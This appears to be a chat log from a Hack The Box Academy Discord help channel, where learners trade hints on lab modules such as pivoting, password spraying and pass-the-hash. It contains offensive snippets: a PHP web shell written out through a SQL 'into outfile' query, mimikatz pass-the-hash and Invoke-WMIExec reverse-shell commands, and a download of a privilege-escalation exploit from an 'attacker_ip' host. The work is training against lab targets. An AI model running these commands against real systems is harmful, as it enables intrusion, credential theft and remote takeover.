Enumerate the "flagDB" database and submit a flag as your answer. - Yes

oohhh I think I got it, thanx

For pivoting skills accessment pivot host has internal ip 172.16.5.15/16 does this mean I have to scan the whole range 172.16.0.0/16 with nmap or 172.16.5.0-245? To discover hosts on that are accessible through the pivot host?

It's been a few months since I did that module, but I can't imagine any scenario where you'd need to scan a /16

I thought that but was then wondering why it is on /16

Are you sure it is? Regardless, just scan the /24

thanx widows have a way sometimes 😉

Thanks, u pretty sure ip a lists it and broad cast is 172.16.255.255

Jeez my target spawning is taking ages

am I the only one? Or is the deployment system down?

Hi I am new, I have a question if anyone can answer it.

In the “ACTIVE DIRECTORY ENUMERATION & ATTACKS” module under the “Internal Password Spraying - from Windows” section, I cannot use the “DomainPasswordSpray.ps1. To elaborate, it won’t generate the UserList even though in the section it said the script automatically created one. I tried using a different namelist like jsmith.txt and john.txt but they all just freeze at

[*] Setting a minute wait in between sprays.

Any advice?

Because the system is domain-joined, you don't need the -UserList flag. The tool can make the queries for the users from the domain

https://github.com/dafthack/DomainPasswordSpray

Hi, can anyone help me with the final Skill Assessment for the HTTPS/TLS Module? I can't decode the cookie value, i guess my payload is wrong? any help appreciated

<@&861185840277487616>

In #858470491676737536 as well

can anyone direct me to any course on htb that helps with rpc? I keep landing on boxes that has some of these open, and I never know how to approach them.

enumerating common services and attacking common services both cover these

this one?

not explicitly finding those

my bad, maybe they dont

been a minute since ive done them,

Footprinting has a part of it I think

Yup, footprinting - smb

yup, just found it, thanks!

And attacking common services - attacking smb too

You’re welcome

hi i'm stuck in Pass the Ticket (PtT) from Linux

question:
Check svc_workstation's sudo privileges and get access as root. Submit the flag in /root/flag.txt directory as the response

what im doing:

• try ssh david got password carlos
• ssh carlos, got svc_workstation's AES-256 HASH

i see many people fail when try hashing AES-256, is it the correct way to try hashing AES-256 ?
anyion can give me a hint ?

Can’t crack that afaik, there’s another file in the general area that will give you the NTLM hash

alright, already find other file
but can't ssh/sudo, still figure it out

hello. please i need help in login brute force module , cracking the password of admin user any hints

i'm in module password attacks PTH(pass the hash)

i ran mimikatz

but i get acces denied

You are not accessing the file via DC01

Thank you for responding. Sorry for being so vague but let me elaborate on the issue. The script runs but it freezes on :

[*] Setting a minute wait in between sprays.

regardless of whether I attach a UserList or not. In the module, it moves onto the next prompt asking “Would you like to conduct the password spraying attack”. I cannot get to that prompt.

You are only listing the file via DC01

Ah, my message got deleted, f lol

Can someone please help me? Ive got the user ||Fiona|| and the password and logged in via RDP, but I cannot find the user I can impersonate to get admin

I mean if you check c:\users maybe or do sql from the command line you might have better luck

The thing is

Ive done that but I cant upload screenshots because they get deleted, even if I put them as spoilers

Ive found 6 users, and 1 user that is a part of the local administrators group, but that 1 user isnt correct

Proper capitalisation?

Iirc this was dumb

Look at them fast before they get deleted

thats all ive found

Sir

If this is about using mssql

That has impersonate permissions

And should probably look there first

Wha, but aaa the way they make it seem

Like find her password, (I found it through rdp) and then it tells me once I am logged in, like as in RDP I thought

What section is this for?

understood so i'm logged in a david how do i find dc01?

So I can look up

They are meaning you didn't try and look at the flag using \\dc01\david

Lol

It's not a local file

Attacking Common Services - Hard

Ah I don't fully recall this one, but you're probably trying too hard. Like I said c:\users is gonna be your friend

None of those users work

Weird

Try cd

cat

cat the file inside the folder

Cat isn't a cmd line command

It'll be type

asaaa

yes, i meant type, lol

hey I'm stuck at "Attacking Common Services " : "Attacking DNS"
I'm not sure I understand the Q
I found (using subbrute.py & names_small.txt) few subdomains I not sure what the meaning of "submit the flag found as a DNS record as the answer" since I didn't found any flag....
some 1 have a hit ?

probably your ticket isn't good anymore

I am pretty sure its not that, he just has to run type and the file located on the system, i wont write the command xd

what do you mean by my ticket ?

Try adding \flag.txt at the end

oh thanks god you are on phone, for a sec i thought the academy best helper don't have good note 🤣

same error message

I need to redo this module when I have it

You need to get the ticket first, try reading the module again

i saw he is on the pass the ticket module and i did have issue with ticket no longer being valid for some reason

weird lol

The full path is \\DC01\david\flag.txt

like MarcieLee hint if the question is about mssql and you are look via rdp then you are on the wrong path

The question isn't I don't think

They just posted a bunch of stuff about mssql earlier

¯_(ツ)_/¯

It got yeeted by a mod

yea i know, but same error message

yea i saw that and also thought that was you 🤣

@pulsar needle if you are on question 3 then it's definitely mssql

But the credentials dont work for MSSQL, and I cant bruteforce it

check your ticket just for sure

I'm not a mod

Ok

Cap

*yet

I'm not lol

what do you mean by ticket ?

Try to read the section again

Try logging in another way to mssql. I think you are missing 'the way'.

i'm on the module before the ticekt

I think the way is locally, but I have no clue how to do that xd

oh you are on the pth section not next ptt section, let me double check

i have a meeting in 3mins so i'll have to pause for a few. i'll be back in an hr

@high reef the quickest way to confirm that you still have access to the dc is running the previous dir command that you run and if you can still see the flag that's mean you still have access and can just get the flag

but if you get permission denied then just run the attack again

also my bad for the ticket thing

no problem!

wait you have confirm what's the right password is why are you still brute forcing 🤣

should I use names.txt?!

Hahha idk, when I get stuck I think outside the box😎

Sqlcmd

Try just the command with no parameters

OH WAIT

lol, nvm

I thought, lmao ,f

The file is david.txt not flag.txt

also stop sending screenshot with cred or other spoiler even with the spoiler it's still a big no no

*that screenshot have 1 sqlcmd command so it's least to say no need to remove that

got the flag

k

Hi im stuck with keeper. i have user flag and now doing the PoCs exploid, but cant guess the pass that is given to me. And hints? Thanks in advance ! 🙂

did you solve it? im stuck at the same point @west spindle

Verify your account in #welcome and you'll have access to #1139981418164920464

read #welcome and #rules after that use /verify at #bot-commands and ask that in #1139981418164920464

windows privesc skills assessment 1
i think it involves ||juicypotato|| and i want to try it, how can i transfer the files to the server so i can test it? i tried with an http server and wget but it did not work, i tried curl too

Hi I am new, I have a question if anyone can answer it.

In the “ACTIVE DIRECTORY ENUMERATION & ATTACKS” module under the “Internal Password Spraying - from Windows” section, I cannot use the “DomainPasswordSpray.ps1. To elaborate, it won’t generate the UserList even though in the section it said the script automatically created one. It freezes at

[*] Setting a minute wait in between sprays.

Any advice?

• http server
• FTP
• base64
• SMB Server
• DNS

Hi for that question the formatting doesn't include the square brackets [] , but it does include the semicolon ;

There are many options out there, just search "file transfers ctf" or "file exfiltration hacking" and you'll find stuff. If one doesn't work, try another, or double check your syntax and troubleshoot exactly where things aren't going as planned

<@&861185840277487616>

pls give this ass eat clown the 👢

i'm having issues getiing the reverse shell

https://academy.hackthebox.com/achievement/285625/116 ez flag after i found out i was supposed to logon to the mssql server lol

there is spoiler in both screenshot

is it Mark ?

you and Noke1 should look into tools like greenshot and flameshot to censor cred, hash and other spoiler

i forgot but if the section doesn't give you the j user hash then that's spoiler

Hi, troube in **Attacking Common Applications >> Exploiting Web Vulnerabilities in Thick-Client **.

I follow the steps, but when I try to compile: C:> javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\client\gui\ClientGuiTest.java - gives me 31 errors in the code...
Now, I changed only what they said

Any help, ideas would be welcomed 🙏

they give her hash

oh then again my bad 🤣

only difference i see is that they are using svc_workstation

💀 Attacking AD is awfully close, and scary, its like a boss approaching

don't worry it's won't kick you in the ball

it's easier for other to help if you ask better question, instead of "i can't fix this error" and 2 screenshot in which one of them is 99% error message and what look a like the command you ran try adding what part of the section are you trying to do, what did you try and what fails in to your question

Anyone around that has done the Value Fuzzing section for the "Attacking Web Applications with FFUF" module?

sure what's the issue?

The section is not accepting my flag answer, even though the flag is being returned to me in the curl command, just as the module described it should return

so basically you have the flag but the section doesn't accept that flag?

Yep, here is a shot:

yep you definitely need to remove that before a mod do it for you

but which section are you on?

holy hell, never mind, i had a space in the answer at the end of the value. yea i was going to delete after posting

thanks for the response though lol

yea adding that part still doesn't help that much

but to be honest just follow this https://0xdf.gitlab.io/2020/08/08/htb-fatty.html#admin-access

also that guy have cheat sheet on decompiling + compiling the client

its a webshell, i cant run cd /, it doesnt stay there, thats my problem, is there a way to transfer the file in one line?

You can just specify an absolute path. Something like IWR http://attacker_ip/potato.exe -Outfile C:\Users\Public\vegetable.exe

and then C:\Users\Public\vegetable.exe [OPTIONS]

you know you can just get a shell from that right?

i tried an one liner revshell but it did not work, bigger commands dont work in general

if you are trying the get a shell from revshells.com then that's generally don't work for me, for windows box if i need a shell i usually go for hoaxshell or meterpreter

i got it working with hoaxshell, thanks a lot man

these are the steps i took, mimikatz and with MS01 creds (this is to enable the lister with MS01 as the user as the question states that the machine will only connect back to MS01). This executes with no errors, however when whoami is passed, the user printed is still julio (to try and mitigate error I tried the same process when RDPing using admin creds which allowed me to PTH into MS01). This was done using the following command:

mimikatz.exe privilege::debug “sekurlsa::pth /user:MS01 /rc4:27306e8dad558c047eb35761abb16fc1 /domain:inlanefreight.htb /run:cmd.exe” exit

A nc listner is configured to listen on any 8001.

Finally, using powershell the following commands are executed to catch the shell (the following socket was configured in powershell3 base64 rev shell gen - 127.16.1.5:8001):

Import-Module .\Invoke-TheHash.psd1

Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command “powershell -e ‘’‘base64 here’‘’”

Note: all instances of cmd and ps are run as admin.

I have tried this sequence various times, on my local machine and with the pwnbox and I just cant get it to work. I’m thinking my error lies in step 6 where I cant PTH to MS01.

i did not copy the reverse shell base 64 in module i copied it from website and still having issues

Hi

Can i know what is this

hi guys im a beginner in cybersecurity, can you tell me how to get started and what to install like kali linux or what

Any*

@rustic sage @grim solar pls read #rules and #welcome if you guys are new here

keep asking for shit like that and you will get the 👢 buddy

Ok my bad

yeah Ive read them

just wanted to know how to get started

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

and #modules message

thanks

Attacking Common Services
Attacking Common Services - Easy

Hello, i am struggling to upload a shell
I tried with mariaDB a lot, and the cmd command dont get me result except of "dir". If i go higher it say that i am not authorized to access.
I tried to code base64 more complexe code to avoid "" '' with no success
The code I use is ||SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\xampp\htdocs\cmd.php";||
If there is another way of uploading a file I would be please to try

THx

any idea with this???

Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01

I have done pth and could not remote to DC01

Your screenshot has spoilers in it. You should probably delete it, or blank out the spoilers.

ok

You're on question 8 of Ad Enum Skill Assessment 2?

AD Enumeration & Attacks - Skills Assessment Part I last question

... i meant you should blank it out from the image. 🙂

The username and hash are part of some of the answers

ok now...

User: in mimikatz output 😉

/domain:dc01

I hate that...

But to answer your question, I used impacket-wmiexec via a proxychain

You don't need to specify .inlanefreight.local

Just dc01

At least I don't believe you do

any hint for module- 77 section- 844

how you get the hash for wmiexec... is that the smae one??

Secretsdump.py with t**** user

What's your actual question: and 2 module numbers mean absolutely nothing to most

What's the module and section name

"Privilege Escalation" module of "Getting started"

And no, my hash was different

But I had the admin hash 🙂

Follow the section carefully if I recall correctly

OK 🙂

Do you specify FQDN in /domain ? I don't think you can remote to DC01 with this method.

@rustic sage Trying to bruteforce the password with rockyou.txt. How long should it take? Going on an hour, but says it will take almost 2000hrs to complete. Using max tasks as 64

yes...

you have chisel.exe??

...

You just specify the domain not FQDN and get process created that will pop in your own system but that shell is in your own system and not any other remote.
If you want remote to DC01, you'll have to follow what wolfie said.

I'm completely stuck on the skill assessment for Pivots, question 4.
I have managed to upload a payload to the webserver but I cannot execute it with ./payloadname.

How am I supposed to actually do anything though?

Don’t have my notes atm, but I believe used metasploit on that one

any help pls

If I understand you correctly, you have a WebShell?

If so, what exactly is the problem?

i can't upload it 😢

Send me a DM.

I'm so stupid, I forgot to add the execution rights to the payload file

i need help.

i am trying to connect to openVPN and i have done so using the sudo openvpn {fileName} and in my HTB home page it shows as connected. the problem is that when i try to ping a machine it can't reach it

this problem has been reoccurring, and haven't found any reliable way of fixing it. it just works if it wants to :/

hey ! i'm a beginner, i'm reading the difference between TCP and UDP ports, do you have a good example where "UDP is suitable for applications that run time-sensitive tasks since dropping packets is faster than waiting for delayed packets due to retransmission" ? thanks!

IPTV, VoIP

oh! make sense! thank you!

Hi everyone. I'm working on the MSSQL section of the Footprinting module, and I'm having trouble with the second question. I cloned the impacket repository from GitHub, navigated to the subdirectory containing mssqlclient.py, and ran the command "python3 mssqlclient.py backdoor@10.10.10.10 -windows-auth" (replacing 10.10.10.10 with the IP of my target). I get this error: No module named "impacket.examples.mssqlshell" This same error occurs in both the Pwnbox and my Kali VM.

If you’re on Kali, try using impacket-mssqlclient instead of mssqlclient.py

Impacket installs can be a nasty thing to debug so hopefully this will just work

Oh wait I’m on mobile, didn’t see the full command. Try calling mssqlclient.py by itself, don’t navigate to the directory, just call it as you would any normal command

When I run the same command from any directory not containing the mssqlclient.py file, I get a file not found error.

Hm, then try impacket-mssqlclient

That did the trick!

I didn't realize there was a pre-installed package called impacket on Kali already. Didn't even need to clone the repo from GitHub. Just replaced "python3 mssqlclient.py" in the command I posted above with "impacket-mssqlclient" as suggested, and it worked. Thanks a ton!

I need a hint for broken authentication skills assessment please

https://academy.hackthebox.com/module/80/section/848

Yep. Know that impacket is a very finicky tool, so people have done what they can in Kali and Parrot to make using it as stable as possible

What is not working?

should not i have the button here to download vpn config?

somewhere around there XD

ya i know its on profile but why would they remove it xD it was handy

lol

HAHAH

so my profile is broken or what

there is no button

weird

any mods

did

thx

not even loading on another browser

thats the link on the button

because someone spammed the other day

i figured it out

it happens when the service to exploit is a web server

because this web servers are open to the internet (i could access from my phone)

cool thanks 😎

please any help with Skills Assessment - File Inclusion, i got cookie after visiting http://94.237.56.76:55913/index.php?page=$$$_ad$$$/index and got to page for logs that doesnt work, Path Traversal not working so cant use cookie poisoning or view any log

tried to fuzz the new parameter but no result

tried /index.php?lo$$=access.log but the parameter only returns the main page

Has anyone ran into any issues during Exploiting Web Vulnerabilities in Thick-Client Applications? I cannot get the server.jar to download to save my life, just outputs to screen. Maybe its time to give it a break

dont try to display it, open a file to write to it.

Hmm. Should just be writing data to file specified. I will re-check again. Thank you!

Likely mixed up editing from the previous example that has you display it.

You are probably correct

Hi guys! Can someone help me with Footprinting medium lab? I got stuck in building query in MSSQL.

Can someone help me with the Internal Password Spraying - from Windows module?

Just finished the Pivoting module, but I don't think I did the skill assessment in the best way, especially for the last question. Would love to pick someones brain on how to do this properly sometime

Import the Library-Question library appropriate for your OS and dotNet version, using the HTBLibrary namespace. What is the output of the Flag.GetFlag() method from the library?

hi, I'm stuck at this question (Introduction to c# module libraries section) and I don't know why
this is my code using HTBLibrary; class test { static void Main(string[] args) { Flag.GetFlag(); } }

and I got this error error CS0246: The type or namespace name 'HTBLibrary' could not be found. Are you missing an assembly reference?

sounds like it cant find where HTBLibrary is supposed to be